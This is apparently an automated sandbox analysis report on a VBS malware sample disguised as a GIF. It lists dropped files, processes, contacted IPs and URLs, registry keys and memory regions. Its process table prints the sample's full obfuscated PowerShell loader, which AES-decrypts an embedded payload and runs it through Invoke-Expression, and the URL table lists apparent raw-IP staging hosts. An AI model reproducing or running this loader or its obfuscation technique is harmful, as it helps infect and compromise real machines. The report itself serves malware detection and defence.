Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
creatednewwaterbottleforme.gIF.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_duy2jxni.myc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1xgj3oo.ln1.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged
= New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g
= [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key
= ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes
= [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes
= TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return
[System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64
= '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado
= Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado:
TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34
-cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&(
$verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://192.3.176.174/60/WDER.txt
|
192.3.176.174
|
||
|
http://192.3.176.174
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://198.46.176.133/Upload/vbs.jpeg
|
198.46.176.133
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://192.3.176.174(
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://198.46.176.133
|
unknown
|
There are 5 hidden URLs, click here to show them.
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.3.176.174
|
unknown
|
United States
|
||
|
198.46.176.133
|
unknown
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
194C19E2000
|
heap
|
page read and write
|
||
|
12411AA0000
|
trusted library allocation
|
page read and write
|
||
|
12410054000
|
heap
|
page read and write
|
||
|
194C19CD000
|
heap
|
page read and write
|
||
|
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
|
12410020000
|
heap
|
page read and write
|
||
|
194C38E0000
|
heap
|
page read and write
|
||
|
194C3C2D000
|
heap
|
page read and write
|
||
|
194C19D9000
|
heap
|
page read and write
|
||
|
124119B0000
|
heap
|
page read and write
|
||
|
B67073000
|
stack
|
page read and write
|
||
|
29617FB000
|
stack
|
page read and write
|
||
|
194C1B20000
|
heap
|
page read and write
|
||
|
194C37DA000
|
heap
|
page read and write
|
||
|
12412294000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345E6000
|
trusted library allocation
|
page read and write
|
||
|
194C37CB000
|
heap
|
page read and write
|
||
|
194C3B43000
|
heap
|
page read and write
|
||
|
194C3B30000
|
heap
|
page read and write
|
||
|
194C37B7000
|
heap
|
page read and write
|
||
|
7FFD345EC000
|
trusted library allocation
|
page execute and read and write
|
||
|
29615FE000
|
stack
|
page read and write
|
||
|
7FFD34530000
|
trusted library allocation
|
page read and write
|
||
|
194C3B73000
|
heap
|
page read and write
|
||
|
194C3925000
|
heap
|
page read and write
|
||
|
194C38AD000
|
heap
|
page read and write
|
||
|
7FFD347C0000
|
trusted library allocation
|
page read and write
|
||
|
194C37AE000
|
heap
|
page read and write
|
||
|
194C3B1A000
|
heap
|
page read and write
|
||
|
194C3B34000
|
heap
|
page read and write
|
||
|
194C3925000
|
heap
|
page read and write
|
||
|
12412071000
|
trusted library allocation
|
page read and write
|
||
|
194C37BA000
|
heap
|
page read and write
|
||
|
B6767E000
|
stack
|
page read and write
|
||
|
7FFD34800000
|
trusted library allocation
|
page read and write
|
||
|
1241004B000
|
heap
|
page read and write
|
||
|
194C3904000
|
heap
|
page read and write
|
||
|
194C3925000
|
heap
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12412718000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34870000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34890000
|
trusted library allocation
|
page read and write
|
||
|
194C3B1C000
|
heap
|
page read and write
|
||
|
7FFD34616000
|
trusted library allocation
|
page execute and read and write
|
||
|
194C37C6000
|
heap
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
|
194C38A1000
|
heap
|
page read and write
|
||
|
194C3B6E000
|
heap
|
page read and write
|
||
|
194C3B19000
|
heap
|
page read and write
|
||
|
7FFD34534000
|
trusted library allocation
|
page read and write
|
||
|
B671FF000
|
stack
|
page read and write
|
||
|
7FFD347B0000
|
trusted library allocation
|
page read and write
|
||
|
12414F6E000
|
trusted library allocation
|
page read and write
|
||
|
194C19D1000
|
heap
|
page read and write
|
||
|
194C38E5000
|
heap
|
page read and write
|
||
|
1242235A000
|
trusted library allocation
|
page read and write
|
||
|
194C37B3000
|
heap
|
page read and write
|
||
|
194C37A2000
|
heap
|
page read and write
|
||
|
194C3904000
|
heap
|
page read and write
|
||
|
B674F6000
|
stack
|
page read and write
|
||
|
194C3B43000
|
heap
|
page read and write
|
||
|
194C37D7000
|
heap
|
page read and write
|
||
|
B670FD000
|
stack
|
page read and write
|
||
|
194C37F6000
|
heap
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
124124FD000
|
trusted library allocation
|
page read and write
|
||
|
12411A10000
|
trusted library allocation
|
page read and write
|
||
|
194C3B71000
|
heap
|
page read and write
|
||
|
194C1B25000
|
heap
|
page read and write
|
||
|
1242A162000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
7FFD347E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34830000
|
trusted library allocation
|
page read and write
|
||
|
1242A13A000
|
heap
|
page read and write
|
||
|
194C38F5000
|
heap
|
page read and write
|
||
|
194C37EC000
|
heap
|
page read and write
|
||
|
2960FFE000
|
stack
|
page read and write
|
||
|
194C39E0000
|
heap
|
page read and write
|
||
|
194C3B20000
|
heap
|
page read and write
|
||
|
12411A60000
|
trusted library allocation
|
page read and write
|
||
|
194C3B6D000
|
heap
|
page read and write
|
||
|
12411EA0000
|
heap
|
page read and write
|
||
|
194C37BA000
|
heap
|
page read and write
|
||
|
12413B6E000
|
trusted library allocation
|
page read and write
|
||
|
194C37F7000
|
heap
|
page read and write
|
||
|
1242A260000
|
heap
|
page execute and read and write
|
||
|
194C3B23000
|
heap
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
|
12411A67000
|
trusted library allocation
|
page read and write
|
||
|
B6717E000
|
stack
|
page read and write
|
||
|
194C39DB000
|
heap
|
page read and write
|
||
|
B676FE000
|
stack
|
page read and write
|
||
|
194C3B91000
|
heap
|
page read and write
|
||
|
194C39D6000
|
heap
|
page read and write
|
||
|
1240FFF0000
|
heap
|
page read and write
|
||
|
194C3B1C000
|
heap
|
page read and write
|
||
|
12412626000
|
trusted library allocation
|
page read and write
|
||
|
124220E0000
|
trusted library allocation
|
page read and write
|
||
|
194C3B24000
|
heap
|
page read and write
|
||
|
7FFD348A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34532000
|
trusted library allocation
|
page read and write
|
||
|
194C1A48000
|
heap
|
page read and write
|
||
|
12411EB0000
|
heap
|
page read and write
|
||
|
194C37A7000
|
heap
|
page read and write
|
||
|
194C3350000
|
heap
|
page read and write
|
||
|
194C19D8000
|
heap
|
page read and write
|
||
|
194C3B7E000
|
heap
|
page read and write
|
||
|
1242A7C0000
|
trusted library section
|
page read and write
|
||
|
1241456E000
|
trusted library allocation
|
page read and write
|
||
|
194C1A48000
|
heap
|
page read and write
|
||
|
194C39D0000
|
heap
|
page read and write
|
||
|
12411A20000
|
heap
|
page readonly
|
||
|
194C3A91000
|
heap
|
page read and write
|
||
|
194C37D2000
|
heap
|
page read and write
|
||
|
B6777E000
|
stack
|
page read and write
|
||
|
1240FFD0000
|
heap
|
page read and write
|
||
|
B677FE000
|
stack
|
page read and write
|
||
|
12422071000
|
trusted library allocation
|
page read and write
|
||
|
194C3B4F000
|
heap
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34860000
|
trusted library allocation
|
page read and write
|
||
|
194C38CD000
|
heap
|
page read and write
|
||
|
194C37F6000
|
heap
|
page read and write
|
||
|
7FFD346EA000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
1242A290000
|
heap
|
page read and write
|
||
|
194C37BA000
|
heap
|
page read and write
|
||
|
194C3919000
|
heap
|
page read and write
|
||
|
194C3890000
|
heap
|
page read and write
|
||
|
1242A070000
|
heap
|
page read and write
|
||
|
194C3B26000
|
heap
|
page read and write
|
||
|
B6824E000
|
stack
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page execute and read and write
|
||
|
194C3B90000
|
heap
|
page read and write
|
||
|
7FFD347D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3453D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD348C0000
|
trusted library allocation
|
page read and write
|
||
|
194C38EC000
|
heap
|
page read and write
|
||
|
7FFD345E0000
|
trusted library allocation
|
page read and write
|
||
|
194C39E0000
|
heap
|
page read and write
|
||
|
194C39EC000
|
heap
|
page read and write
|
||
|
194C3901000
|
heap
|
page read and write
|
||
|
194C3B12000
|
heap
|
page read and write
|
||
|
194C3AFD000
|
heap
|
page read and write
|
||
|
194C3B2D000
|
heap
|
page read and write
|
||
|
194C1970000
|
heap
|
page read and write
|
||
|
7FFD348F0000
|
trusted library allocation
|
page read and write
|
||
|
194C3792000
|
heap
|
page read and write
|
||
|
194C3A90000
|
heap
|
page read and write
|
||
|
B682CD000
|
stack
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page read and write
|
||
|
194C38B0000
|
heap
|
page read and write
|
||
|
194C37F4000
|
heap
|
page read and write
|
||
|
12411A30000
|
trusted library allocation
|
page read and write
|
||
|
2960CF9000
|
stack
|
page read and write
|
||
|
194C1A48000
|
heap
|
page read and write
|
||
|
194C379B000
|
heap
|
page read and write
|
||
|
7FFD34810000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34533000
|
trusted library allocation
|
page execute and read and write
|
||
|
1242A0C2000
|
heap
|
page read and write
|
||
|
12410025000
|
heap
|
page read and write
|
||
|
B6737E000
|
stack
|
page read and write
|
||
|
194C19D2000
|
heap
|
page read and write
|
||
|
1242A0D8000
|
heap
|
page read and write
|
||
|
29616FF000
|
stack
|
page read and write
|
||
|
12422489000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348EA000
|
trusted library allocation
|
page read and write
|
||
|
B67479000
|
stack
|
page read and write
|
||
|
B66DDE000
|
stack
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page read and write
|
||
|
194C3C2C000
|
heap
|
page read and write
|
||
|
7FFD34720000
|
trusted library allocation
|
page execute and read and write
|
||
|
124120F3000
|
trusted library allocation
|
page read and write
|
||
|
124119F0000
|
trusted library allocation
|
page read and write
|
||
|
194C39E0000
|
heap
|
page read and write
|
||
|
12410061000
|
heap
|
page read and write
|
||
|
194C3B18000
|
heap
|
page read and write
|
||
|
124100D0000
|
heap
|
page read and write
|
||
|
194C39D5000
|
heap
|
page read and write
|
||
|
1242A0BF000
|
heap
|
page read and write
|
||
|
194C3B4D000
|
heap
|
page read and write
|
||
|
194C39E0000
|
heap
|
page read and write
|
||
|
194C19CE000
|
heap
|
page read and write
|
||
|
1242A0BD000
|
heap
|
page read and write
|
||
|
1242A370000
|
heap
|
page read and write
|
||
|
7FFD34700000
|
trusted library allocation
|
page execute and read and write
|
||
|
194C38C8000
|
heap
|
page read and write
|
||
|
194C38C5000
|
heap
|
page read and write
|
||
|
7FFD34850000
|
trusted library allocation
|
page read and write
|
||
|
1242A3EE000
|
heap
|
page read and write
|
||
|
194C3912000
|
heap
|
page read and write
|
||
|
1242A0BA000
|
heap
|
page read and write
|
||
|
194C3AF7000
|
heap
|
page read and write
|
||
|
194C19D2000
|
heap
|
page read and write
|
||
|
12410082000
|
heap
|
page read and write
|
||
|
194C391D000
|
heap
|
page read and write
|
||
|
12412060000
|
heap
|
page execute and read and write
|
||
|
194C3B43000
|
heap
|
page read and write
|
||
|
7FFD347F0000
|
trusted library allocation
|
page read and write
|
||
|
2960DFE000
|
stack
|
page read and write
|
||
|
194C3925000
|
heap
|
page read and write
|
||
|
1242A144000
|
heap
|
page read and write
|
||
|
B6727C000
|
stack
|
page read and write
|
||
|
12422080000
|
trusted library allocation
|
page read and write
|
||
|
1242A3DD000
|
heap
|
page read and write
|
||
|
194C38E9000
|
heap
|
page read and write
|
||
|
194C39F8000
|
heap
|
page read and write
|
||
|
194C39D8000
|
heap
|
page read and write
|
||
|
194C39CF000
|
heap
|
page read and write
|
||
|
7FFD3458C000
|
trusted library allocation
|
page execute and read and write
|
||
|
B6787C000
|
stack
|
page read and write
|
||
|
B675F9000
|
stack
|
page read and write
|
||
|
194C38DD000
|
heap
|
page read and write
|
||
|
1241008A000
|
heap
|
page read and write
|
||
|
194C3790000
|
heap
|
page read and write
|
||
|
1242A267000
|
heap
|
page execute and read and write
|
||
|
194C3B35000
|
heap
|
page read and write
|
||
|
124100CA000
|
heap
|
page read and write
|
||
|
194C37BF000
|
heap
|
page read and write
|
||
|
194C1870000
|
heap
|
page read and write
|
||
|
194C3891000
|
heap
|
page read and write
|
||
|
12412779000
|
trusted library allocation
|
page read and write
|
||
|
194C39E6000
|
heap
|
page read and write
|
||
|
12412632000
|
trusted library allocation
|
page read and write
|
||
|
B67577000
|
stack
|
page read and write
|
||
|
194C3B1C000
|
heap
|
page read and write
|
||
|
194C3AFD000
|
heap
|
page read and write
|
||
|
194C19D9000
|
heap
|
page read and write
|
||
|
B673FD000
|
stack
|
page read and write
|
||
|
7FFD34840000
|
trusted library allocation
|
page read and write
|
||
|
194C38B5000
|
heap
|
page read and write
|
||
|
12422369000
|
trusted library allocation
|
page read and write
|
||
|
1241316E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3454B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346E1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD348B0000
|
trusted library allocation
|
page read and write
|
||
|
194C3914000
|
heap
|
page read and write
|
||
|
194C39F8000
|
heap
|
page read and write
|
||
|
194C39E2000
|
heap
|
page read and write
|
||
|
194C3B25000
|
heap
|
page read and write
|
||
|
194C39DD000
|
heap
|
page read and write
|
||
|
194C38F8000
|
heap
|
page read and write
|
||
|
7FFD34712000
|
trusted library allocation
|
page read and write
|
||
|
29612FE000
|
stack
|
page read and write
|
||
|
B672FE000
|
stack
|
page read and write
|
||
|
1242A170000
|
heap
|
page execute and read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page read and write
|
||
|
194C3925000
|
heap
|
page read and write
|
||
|
194C1950000
|
heap
|
page read and write
|
||
|
194C3B43000
|
heap
|
page read and write
|
||
|
12410086000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
124100A2000
|
heap
|
page read and write
|
||
|
194C3B43000
|
heap
|
page read and write
|
||
|
7DF404580000
|
trusted library allocation
|
page execute and read and write
|
||
|
194C37F6000
|
heap
|
page read and write
|
||
|
12411AB0000
|
heap
|
page read and write
|
||
|
194C19A7000
|
heap
|
page read and write
|
||
|
194C3791000
|
heap
|
page read and write
|
||
|
7FFD34540000
|
trusted library allocation
|
page read and write
|
||
|
194C37F6000
|
heap
|
page read and write
|
||
|
194C3B15000
|
heap
|
page read and write
|
||
|
194C3B31000
|
heap
|
page read and write
|
||
|
194C39F8000
|
heap
|
page read and write
|
||
|
194C19A0000
|
heap
|
page read and write
|
||
|
29614FE000
|
stack
|
page read and write
|
||
|
1242A670000
|
heap
|
page read and write
|
||
|
194C39D0000
|
heap
|
page read and write
|
||
|
194C37EF000
|
heap
|
page read and write
|
||
|
1240FFC0000
|
heap
|
page read and write
|
||
|
194C39E7000
|
heap
|
page read and write
|
||
|
194C37DF000
|
heap
|
page read and write
|
||
|
194C3925000
|
heap
|
page read and write
|
||
|
12411AB4000
|
heap
|
page read and write
|
||
|
194C3B1F000
|
heap
|
page read and write
|
||
|
29611FF000
|
stack
|
page read and write
|
||
|
7FFD348F4000
|
trusted library allocation
|
page read and write
|
||
|
12410040000
|
heap
|
page read and write
|
||
|
2960EFE000
|
stack
|
page read and write
|
||
|
1241596E000
|
trusted library allocation
|
page read and write
|
||
|
194C37E3000
|
heap
|
page read and write
|
There are 272 hidden memdumps, click here to show them.